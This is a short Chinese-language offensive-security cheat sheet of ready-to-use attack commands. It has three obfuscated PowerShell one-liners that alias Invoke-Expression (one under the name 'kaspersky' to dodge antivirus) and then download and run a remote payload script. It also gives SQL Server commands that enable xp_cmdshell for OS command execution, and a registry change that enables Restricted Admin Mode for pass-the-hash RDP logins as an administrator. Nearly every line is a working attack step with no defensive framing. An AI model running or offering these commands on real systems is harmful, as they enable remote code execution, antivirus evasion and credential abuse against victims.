速查表

powershell快速上线

powershell set-alias -name kaspersky -value Invoke-Expression;"$a1='kaspersky ((new-object net.webclient).downl';$a2='oadstring(''https://xx.xxxx.online/a.ps1''))';$a3=$a1,$a2;kaspersky(-join $a3)"

echo set-alias -name hhh -value IEX;hhh(New-Object "NeT.WebC`li`ent")."Down`l`oadStr`ing"('ht'+'tP://19’+'2.168.1.1'+'2/payload.ps1') | %psmodulepath:~24,10% -

CMD /C ECHO SET-ALIAS -NAME XZ -VALUE iex;x^z (nEW-oBJECT "NeT.WebClient").D^O^W^N^L^O^A^D^S^T^R^I^N^G('HT'+'Tps://x.x.x.x') | P^O^W^E^R^S^H^E^L^L -

sqlserver_xpcmdshell

select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'  #查看xpcmdshell是否开启
#手工打开xpcmdshell
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;

利用hash远程登录管理员账号

#使用hash远程登录RDP，需要开启"Restricted Admin Mode"
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f #开启Restricted Admin mode
REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin" #查看是否已开启0x0则表示开启

powershell快速上线​

sqlserver_xpcmdshell​

利用hash远程登录管理员账号​

powershell快速上线

sqlserver_xpcmdshell

利用hash远程登录管理员账号